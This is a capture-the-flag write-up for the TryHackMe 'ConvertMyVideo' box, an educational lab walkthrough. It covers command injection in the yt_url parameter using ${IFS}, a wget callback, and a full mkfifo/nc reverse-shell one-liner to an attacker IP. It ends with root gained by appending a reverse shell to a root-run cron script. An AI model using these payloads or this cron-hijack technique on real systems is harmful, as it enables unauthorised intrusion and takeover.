THM | ConvertMyVideo

This is a Linux box. You can find it here.

Skill Learned

  • Command Injection

  • Finding Cron via Pspy64

NMAP

IP:10.10.185.77

nmap

Port 80

port 80

start burp

we found an error in the response

burp

Foothold/shell

we can try for command injection 

`whoami`
whoami

we get www-data

Let's see if we can get a hit on our machine using wget, more on ${IFS} refer this

using yt_url=`wget${IFS}http://10.9.0.78/`

we get the hit

Let's try for a reverse shell 

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

replace " " with ${IFS} and "&" with %26

we get the shell but the connection is lost soon

let's try uploading the script and then executing it

now let's execute it

found flag.txt

flag.txt

Priv Esc

copy LinEnum.sh to the box and run it

we found cron is running

found cron running

Let's copy pspy64 to the box and run

./pspy64

I found the cron script clean.sh

cat clean.sh

we can append the reverse shell and since it is triggered by the root we might get root shell

edit clean.sh

and wait for it to trigger

and we are the root

root
PreviousTHM | CMessNextHTB | Editorial

Last updated